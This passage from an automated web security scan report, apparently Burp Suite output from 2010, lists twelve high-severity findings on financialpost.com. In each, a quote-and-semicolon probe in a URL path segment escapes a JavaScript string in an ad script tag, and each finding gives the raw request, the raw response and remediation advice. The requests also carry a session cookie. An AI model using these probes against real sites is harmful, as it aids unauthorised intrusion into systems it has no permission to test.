This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/hr1c50a'%3b34e2fdea153/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43240


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/hr1c50a';34e2fdea153/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=hr1c50a';34e2fdea153;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68906842?">
...[SNIP]...

1.101. http://www.financialpost.com/executive/smart-shift/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/smart-shift/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d117'%3b6a5beb61248 was submitted in the REST URL parameter 1. This input was echoed as 8d117';6a5beb61248 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive8d117'%3b6a5beb61248/smart-shift/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37612


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive8d117';6a5beb61248/smart-shift/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive8d117';6a5beb61248;kw=smart-shift;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70165164?">
...[SNIP]...

1.102. http://www.financialpost.com/executive/smart-shift/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/smart-shift/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1806'%3b95ff51b1cd7 was submitted in the REST URL parameter 2. This input was echoed as c1806';95ff51b1cd7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/smart-shiftc1806'%3b95ff51b1cd7/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43420


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/smart-shiftc1806';95ff51b1cd7/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=smart-shiftc1806';95ff51b1cd7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34941163?">
...[SNIP]...

1.103. http://www.financialpost.com/executive/social+media+worth+investment/3972248/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/social+media+worth+investment/3972248/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46365'%3b0515ef5e13 was submitted in the REST URL parameter 1. This input was echoed as 46365';0515ef5e13 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive46365'%3b0515ef5e13/social+media+worth+investment/3972248/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79029
Expires: Sun, 19 Dec 2010 03:12:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive46365';0515ef5e13/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive46365';0515ef5e13;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=76882130?">
...[SNIP]...

1.104. http://www.financialpost.com/executive/social+media+worth+investment/3972248/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/social+media+worth+investment/3972248/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbf67'%3bc8bd6c0d374 was submitted in the REST URL parameter 3. This input was echoed as dbf67';c8bd6c0d374 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/social+media+worth+investment/3972248dbf67'%3bc8bd6c0d374/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70627
Expires: Sun, 19 Dec 2010 03:12:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/social-media-worth-investment/3972248dbf67';c8bd6c0d374/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=social-media-worth-investment;kw=3972248dbf67';c8bd6c0d374;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=
...[SNIP]...

1.105. http://www.financialpost.com/executive/social+media+worth+investment/3972248/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/social+media+worth+investment/3972248/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 765b9'%3ba07db4f3a59 was submitted in the REST URL parameter 4. This input was echoed as 765b9';a07db4f3a59 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/social+media+worth+investment/3972248/765b9'%3ba07db4f3a59 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44205


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/social%20media%20worth%20investment/3972248/765b9';a07db4f3a59/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=social%20media%20worth%20investment;kw=3972248;kw=765b9';a07db4f3a59;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroun
...[SNIP]...

1.106. http://www.financialpost.com/executive/women/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b4ce'%3b81b991a8c20 was submitted in the REST URL parameter 1. This input was echoed as 2b4ce';81b991a8c20 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive2b4ce'%3b81b991a8c20/women/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43335


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive2b4ce';81b991a8c20/women/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive2b4ce';81b991a8c20;kw=women;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68754463?">
...[SNIP]...

1.107. http://www.financialpost.com/executive/women/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/women/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aa96'%3bb6cfa407c54 was submitted in the REST URL parameter 2. This input was echoed as 4aa96';b6cfa407c54 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/women4aa96'%3bb6cfa407c54/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44120


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/women4aa96';b6cfa407c54/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=women4aa96';b6cfa407c54;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=84484550?">
...[SNIP]...

1.108. http://www.financialpost.com/images/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18de6'%3b4749081e3e1 was submitted in the REST URL parameter 1. This input was echoed as 18de6';4749081e3e1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images18de6'%3b4749081e3e1/favicon.ico HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55; s_cc=true; s_depth=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:12 GMT
Date: Sun, 19 Dec 2010 03:03:12 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43028


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/images18de6';4749081e3e1/favicon;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=images18de6';4749081e3e1;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=91586613?">
...[SNIP]...

1.109. http://www.financialpost.com/images/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a887a'%3b741dad57e16 was submitted in the REST URL parameter 2. This input was echoed as a887a';741dad57e16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/a887a'%3b741dad57e16 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55; s_cc=true; s_depth=1; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:20 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43044


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/images/a887a';741dad57e16/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=images;kw=a887a';741dad57e16;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=58957365?">
...[SNIP]...

1.110. http://www.financialpost.com/includes/header/ccn-login.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /includes/header/ccn-login.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42deb'%3bac05bd1a0a1 was submitted in the REST URL parameter 1. This input was echoed as 42deb';ac05bd1a0a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes42deb'%3bac05bd1a0a1/header/ccn-login.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:12 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43285


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/includes42deb';ac05bd1a0a1/header/ccn-login;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=includes42deb';ac05bd1a0a1;kw=header;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=97543753?">
...[SNIP]...

1.111. http://www.financialpost.com/includes/header/ccn-login.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /includes/header/ccn-login.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71f71'%3bf62fcd6e2bf was submitted in the REST URL parameter 2. This input was echoed as 71f71';f62fcd6e2bf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/header71f71'%3bf62fcd6e2bf/ccn-login.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:17 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 39220


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/includes/header71f71';f62fcd6e2bf/ccn-login;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=includes;kw=header71f71';f62fcd6e2bf;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=47352505?">
...[SNIP]...

1.112. http://www.financialpost.com/includes/header/ccn-login.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /includes/header/ccn-login.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 172af'%3b120f40364cb was submitted in the REST URL parameter 3. This input was echoed as 172af';120f40364cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/header/172af'%3b120f40364cb HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:25 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43251


...[SNIP]...
